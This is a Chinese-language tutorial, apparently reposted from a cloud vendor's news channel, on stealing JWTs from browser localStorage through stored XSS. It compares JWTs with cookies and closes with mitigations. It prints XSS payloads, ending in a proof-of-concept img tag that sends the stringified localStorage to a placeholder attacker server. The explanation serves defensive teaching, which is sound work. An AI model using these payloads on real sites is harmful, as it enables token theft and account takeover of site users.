如何通過XSS竊取localStorage中的JWT

如何通過XSS竊取localStorage中的JWT，針對這個問題，這篇文章詳細介紹了相對應(yīng)的分析和解答，希望可以幫助更多想解決這個問題的小伙伴找到更簡單易行的方法。

寫在前面的話

我遇到過一些JSON Web令牌（JWT）的不安全實現(xiàn)，而這些不安全實現(xiàn)最終導(dǎo)致了目標Web應(yīng)用程序遭到黑客入侵。在某些場景中，攻擊者可以利用錯誤配置并通過XSS漏洞來竊取管理員令牌，或偽造用戶注冊過程中的用戶協(xié)議并利用管理員權(quán)限創(chuàng)建標準用戶賬號。

JWT與傳統(tǒng)的Cookie有所不同，它們雖然很相似，但很多人會錯誤地認為攻擊者無法使用這種方式來對JWT進行攻擊。

我們將對JWT進行簡單介紹，以及JWT和傳統(tǒng)Cookie之間的區(qū)別，并演示如何竊取JWT，最后還會給出相應(yīng)的安全解決方案。

JSON Web令牌是什么？

簡而言之，JWT，即JSON Web令牌，它可以幫助用戶快速簡單地完成系統(tǒng)的身份驗證（一般使用開源庫實現(xiàn)驗證機制）。JWT由以下三個部分組成，每個部分由“.”分隔：

header.payload.signature

header表明所使用的哈希算法，payload中包含與用戶相關(guān)的信息（例如角色和訪問權(quán)限等），signature用于確保消息完整性。

在大多數(shù)配置中，當用戶提供了有效憑證時，這個令牌會在HTTP頭中進行設(shè)置，并用于后續(xù)身份授權(quán)，這一點跟標準的會話Cookie類似。

最近這幾年，社區(qū)曝光過很多JWT的相關(guān)漏洞，而且也有很多技術(shù)文章對這些漏洞進行過討論了，比如說算法攻擊以及通過Payload篡改來實現(xiàn)提權(quán)等等。那么在這篇文章中，我并不打算過多去討論JWT架構(gòu)以及之前的相關(guān)漏洞。

如何恢復(fù)傳統(tǒng)Cookie和JWT

Cookie的作用就在于，它可以向一個有狀態(tài)協(xié)議（例如HTTP）提供相關(guān)的狀態(tài)信息。我們舉一個簡單的例子，會話Cookie就可以用來追蹤一款Web應(yīng)用程序上經(jīng)過身份驗證的用戶會話。為了實現(xiàn)這一點，會話的記錄必須同時存在于服務(wù)器端和客戶端上。

從JWT的角度來看，令牌可以是無狀態(tài)的。也就是說，服務(wù)器端是不會存儲會話記錄的。相反，每一個發(fā)送至服務(wù)器端的請求都會包含一個用戶令牌，服務(wù)器會根據(jù)令牌信息來驗證用戶的身份權(quán)限。

Cookie和JWT都遵循相似的事件流來請求和接收會話令牌，當用戶提供有效的身份憑證之后，服務(wù)器會返回一個包含了會話令牌的響應(yīng)。不同之處就在于，Cookie是使用SET-COOKIE命令設(shè)置的，但JWT一般是在AUTHORIZATION頭中設(shè)置的。

它們存儲在哪里?

我們用默認配置來進行總結(jié)：

localStorage / sessionStorage

默認情況下，Web了瀏覽器容器幾乎是相同的。關(guān)閉瀏覽器之后，localStorage將保持不變，sessionStorage僅持續(xù)到瀏覽器關(guān)閉之前。因此，只能在客戶端讀取到，而不能在服務(wù)器端讀取到，而且只能通過JavaScript讀取到。

Cookie

我們的目的是要讓發(fā)送的信息在服務(wù)器端讀取和驗證。如果配置了正確的保護機制，惡意JavaScript將很難讀取到這些數(shù)據(jù)。

傳統(tǒng)Cookie保護

一般來說，攻擊者會通過XSS漏洞來攻擊身份認證Cookie，然后嘗試劫持目標的管理員會話，并最終通過攻擊包含漏洞的Web服務(wù)器打開進入目標網(wǎng)絡(luò)系統(tǒng)的“大門”，

我們可以為存儲在Cookie容器中的數(shù)據(jù)設(shè)置Header參數(shù)，除了解決底層XSS問題之外，有HttpOnly、secure、path和domain等標志可以提供不同級別的安全保護。然后再將JWT存儲在localStorage中......這就像將密碼存儲在文本文件中一樣。

如何通過XSS漏洞竊取localStorage中的JWT

在近期的一次研究中，我發(fā)現(xiàn)了一個存儲型XSS漏洞，而目標應(yīng)用程序正好使用了JWT來作為身份驗證機制的實現(xiàn)。Payload設(shè)置成功后，任何訪問了該Web頁面的用戶其JWT都會被發(fā)送給攻擊者。

一開始，我無法通過XSS來獲取JWT。主要是因為每個JWT都存儲有唯一的標識符/鍵，所以在不知道這些信息的情況下是無法調(diào)用它的。比如說，在JavaScript警告框中顯示標準Cookie（無保護機制）的典型方法如下：

<script>alert(document.cookie)</script>

因為localStorage中的數(shù)據(jù)會存儲在一個數(shù)組中，它無法通過類似方法來調(diào)用或讀?。?/p>

<script>alert(localStorage)</script>

但是，我們可以通過使用getItem()函數(shù)來獲取存儲在localStorage或sessionStorage中的每一個對象：

<script>alert(localStorage.getItem(‘key’))</script>

參考樣例：

<script>alert(localStorage.getItem(‘ServiceProvider.kdciaasdkfaeanfaegfpe23.username@company.com.accessToken’))</script>

如上圖所示，我們還需要弄清楚“key”這個唯一標識符是什么：

我猜有的人可能已經(jīng)想用暴力破解的方式了吧，或者寫一個JavaScript腳本來迭代localStorage中的每一個對象。這里我們可以使用JSON.Stringify來實現(xiàn)，這個函數(shù)可以將localStorage中存儲的內(nèi)容轉(zhuǎn)換為字符串并繞過這種障礙：

<script>alert(JSON.stringify(localStorage))</script>

下面給出的是利用XSS竊取JWT的完整PoC：

<img src=’https://<attacker-server>/yikes?jwt=’+JSON.stringify(localStorage);’--!>

根據(jù)不同目標系統(tǒng)的實現(xiàn)機制，上述的PoC可能會給我們提供IdToken、accessToken或其他相關(guān)的令牌。IdToken可以用于身份驗證并偽裝成有問題的用戶，其本質(zhì)上是帳戶接管，而accessToken可用身份驗證端點來生成一個的全新IdToken。

這里最大的問題就在于，我們無法將傳統(tǒng)的Cookie安全標志應(yīng)用到localStorage中存儲的項。

緩解方案

1、永遠不要在localStorage中存儲任何敏感信息，比如說JWT或其他關(guān)鍵的憑據(jù)信息。localStorage的目的是通過保存網(wǎng)站狀態(tài)和設(shè)置來為用戶提供更好的體驗度。

2、可以考慮使用Cookie頭。

3、設(shè)置Cookie頭保護機制。

4、永遠不要在頁面、URL以及其他源代碼中顯示令牌。

關(guān)于如何通過XSS竊取localStorage中的JWT問題的解答就分享到這里了，希望以上內(nèi)容可以對大家有一定的幫助，如果你還有很多疑惑沒有解開，可以關(guān)注億速云行業(yè)資訊頻道了解更多相關(guān)知識。